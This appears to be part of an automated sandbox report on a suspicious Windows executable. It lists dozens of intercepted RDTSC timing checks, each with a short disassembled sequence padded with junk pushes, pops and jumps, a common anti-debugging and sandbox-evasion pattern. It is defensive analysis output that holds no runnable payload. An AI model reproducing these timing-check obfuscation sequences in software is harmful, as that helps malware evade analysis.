                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E5F4 second address: 95E604 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F98219BDB66h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E604 second address: 95E608 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95EE41 second address: 95EE78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F98219BDB76h 0x0000000d jmp 00007F98219BDB79h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95EE78 second address: 95EE7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95F138 second address: 95F15E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98219BDB79h 0x00000007 ja 00007F98219BDB66h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96367E second address: 963684 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 963684 second address: 963690 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007F98219BDB66h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 963690 second address: 963694 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 963AD2 second address: 963AF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F98219BDB78h 0x00000009 je 00007F98219BDB66h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 963EFF second address: 963F03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 963F03 second address: 963F09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 964037 second address: 96403F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96403F second address: 964046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 964046 second address: 964054 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9820CD6B9Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 964054 second address: 964058 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96B1CD second address: 96B1F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9820CD6BA1h 0x00000009 jmp 00007F9820CD6B9Bh 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 971916 second address: 971930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F98219BDB6Bh 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F98219BDB66h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 971A74 second address: 971A80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F9820CD6B96h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 971A80 second address: 971A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 971A89 second address: 971ACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F9820CD6B96h 0x0000000a jmp 00007F9820CD6B9Eh 0x0000000f popad 0x00000010 jl 00007F9820CD6BAEh 0x00000016 jmp 00007F9820CD6BA6h 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jo 00007F9820CD6B96h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 971ACA second address: 971ACE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 971C1A second address: 971C1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 971C1E second address: 971C32 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F98219BDB66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F98219BDB66h 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 971C32 second address: 971C61 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9820CD6B96h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F9820CD6B9Bh 0x00000012 push edi 0x00000013 pop edi 0x00000014 jng 00007F9820CD6B96h 0x0000001a popad 0x0000001b popad 0x0000001c push ecx 0x0000001d push ecx 0x0000001e push eax 0x0000001f pop eax 0x00000020 pop ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 jnp 00007F9820CD6B96h 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 973046 second address: 973055 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9771F2 second address: 9771FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9771FB second address: 977205 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97C8DE second address: 97C8FA instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9820CD6B96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9820CD6BA0h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97EFD1 second address: 97F010 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F98219BDB66h 0x0000000a jmp 00007F98219BDB79h 0x0000000f jne 00007F98219BDB66h 0x00000015 popad 0x00000016 jnc 00007F98219BDB68h 0x0000001c pop ecx 0x0000001d pushad 0x0000001e push ecx 0x0000001f jc 00007F98219BDB66h 0x00000025 pop ecx 0x00000026 push ecx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98B92F second address: 98B935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98B935 second address: 98B93B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98B506 second address: 98B510 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F9820CD6B96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98B674 second address: 98B678 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98EF4F second address: 98EF59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F9820CD6B96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98EF59 second address: 98EF68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98219BDB6Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 994D75 second address: 994D79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A007B second address: 9A0089 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F98219BDB6Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A0089 second address: 9A008D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A008D second address: 9A00A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F98219BDB73h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A00A6 second address: 9A00B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F9820CD6B9Ah 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A62FC second address: 9A6315 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F98219BDB73h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A643C second address: 9A644E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F9820CD6B9Ah 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A644E second address: 9A6452 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A6452 second address: 9A6458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A6BDD second address: 9A6C00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jne 00007F98219BDB66h 0x00000010 jmp 00007F98219BDB71h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AB333 second address: 9AB347 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F9820CD6B96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AB347 second address: 9AB356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F98219BDB66h 0x0000000a popad 0x0000000b push ebx 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop ebx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AAE24 second address: 9AAE38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9820CD6B9Dh 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AAE38 second address: 9AAE3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AAE3E second address: 9AAE6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F9820CD6B96h 0x0000000a popad 0x0000000b je 00007F9820CD6BACh 0x00000011 jmp 00007F9820CD6BA0h 0x00000016 jnc 00007F9820CD6B96h 0x0000001c jc 00007F9820CD6BABh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AAE6D second address: 9AAE8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F98219BDB6Fh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F98219BDB6Ch 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AAE8F second address: 9AAE94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AF493 second address: 9AF49D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AF49D second address: 9AF4A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AF4A3 second address: 9AF4A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B4D2B second address: 9B4D2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B4D2F second address: 9B4D35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B4D35 second address: 9B4D4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9820CD6BA1h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B4D4C second address: 9B4D72 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jno 00007F98219BDB66h 0x00000009 jmp 00007F98219BDB70h 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jnp 00007F98219BDB66h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B4D72 second address: 9B4D76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B4D76 second address: 9B4D8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F98219BDB66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F98219BDB6Ah 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B4D8C second address: 9B4D9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F9820CD6B96h 0x0000000a jng 00007F9820CD6B96h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B70A9 second address: 9B70AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B70AD second address: 9B70B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C7FF7 second address: 9C7FFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C9DC0 second address: 9C9DC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C9EDA second address: 9C9EE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CC7A9 second address: 9CC7B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9820CD6B9Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CC7B9 second address: 9CC7C9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a jc 00007F98219BDB66h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CC7C9 second address: 9CC7CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CC7CD second address: 9CC7D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D8F28 second address: 9D8F37 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9820CD6B96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DCEB8 second address: 9DCEC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F98219BDB66h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DCEC8 second address: 9DCECC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DD00C second address: 9DD02B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F98219BDB79h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DD332 second address: 9DD37B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9820CD6BA5h 0x00000008 pushad 0x00000009 popad 0x0000000a jnl 00007F9820CD6B96h 0x00000010 jmp 00007F9820CD6BA3h 0x00000015 popad 0x00000016 push edi 0x00000017 pushad 0x00000018 popad 0x00000019 jl 00007F9820CD6B96h 0x0000001f pop edi 0x00000020 pop edx 0x00000021 pop eax 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 jno 00007F9820CD6B96h 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DD7F7 second address: 9DD82B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F98219BDB76h 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F98219BDB73h 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DD82B second address: 9DD83A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jns 00007F9820CD6B96h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E1D69 second address: 9E1D88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F98219BDB73h 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E1D88 second address: 9E1D90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E1DE3 second address: 9E1E19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 or edx, dword ptr [ebp+122D2997h] 0x0000000e push 00000004h 0x00000010 or edx, 331BCB98h 0x00000016 push eax 0x00000017 jp 00007F98219BDB6Bh 0x0000001d pop edx 0x0000001e call 00007F98219BDB69h 0x00000023 push eax 0x00000024 push edx 0x00000025 jne 00007F98219BDB68h 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E1E19 second address: 9E1E62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9820CD6BA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007F9820CD6B9Ch 0x00000011 jp 00007F9820CD6B96h 0x00000017 pop edx 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c jbe 00007F9820CD6BA3h 0x00000022 jmp 00007F9820CD6B9Dh 0x00000027 mov eax, dword ptr [eax] 0x00000029 push esi 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E3C51 second address: 9E3C55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E581E second address: 9E5822 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E5822 second address: 9E582E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F98219BDB66h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50502E0 second address: 50502FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9820CD6BA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50502FC second address: 5050300 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050300 second address: 5050306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050306 second address: 505030C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 505030C second address: 505031B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 505031B second address: 505032F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98219BDB70h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 505032F second address: 5050341 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9820CD6B9Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050341 second address: 5050345 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050345 second address: 5050357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov bx, 15B0h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop esi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050357 second address: 50503A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 pushad 0x0000000a mov di, 4AE0h 0x0000000e pushad 0x0000000f push edx 0x00000010 pop eax 0x00000011 movsx ebx, cx 0x00000014 popad 0x00000015 popad 0x00000016 pop ebp 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F98219BDB78h 0x0000001e xor ax, 7058h 0x00000023 jmp 00007F98219BDB6Bh 0x00000028 popfd 0x00000029 push eax 0x0000002a push edx 0x0000002b mov esi, 4179DBA5h 0x00000030 rdtsc
